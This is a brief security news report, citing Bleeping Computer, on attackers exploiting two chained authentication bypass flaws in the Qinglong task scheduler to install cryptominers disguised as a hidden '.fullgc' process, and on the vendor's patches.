Hackers exploit Qinglong vulnerabilities to deploy cryptominers

As reported by Bleeping Computer, hackers are actively exploiting two authentication bypass vulnerabilities in the popular open-source task scheduling tool Qinglong to deploy cryptominers on developers' servers. The exploitation began in early February, prior to the public disclosure of the security flaws at the end of the month.

The vulnerabilities, identified as CVE-2026-3965 and CVE-2026-4047, affect Qinglong versions 2.20.1 and older. They can be chained together to achieve remote code execution. The flaws stem from a mismatch between the security middleware's assumptions and the Express.js routing behavior, allowing attackers to bypass authentication. Attackers have been targeting publicly exposed Qinglong panels since February 7, modifying the config.sh file to download and execute a cryptominer disguised as a hidden process named ".fullgc". This process consumes significant CPU resources, mimicking an innocuous but intensive system process to evade detection.

The downloaded miner variants support multiple architectures, including Linux x86_64, ARM64, and macOS. While Qinglong maintainers released an update, the initial fix was insufficient, with a more effective patch addressing the authentication bypass arriving later. The ongoing exploitation highlights the risks associated with unpatched open-source software.

Source: Bleeping Computer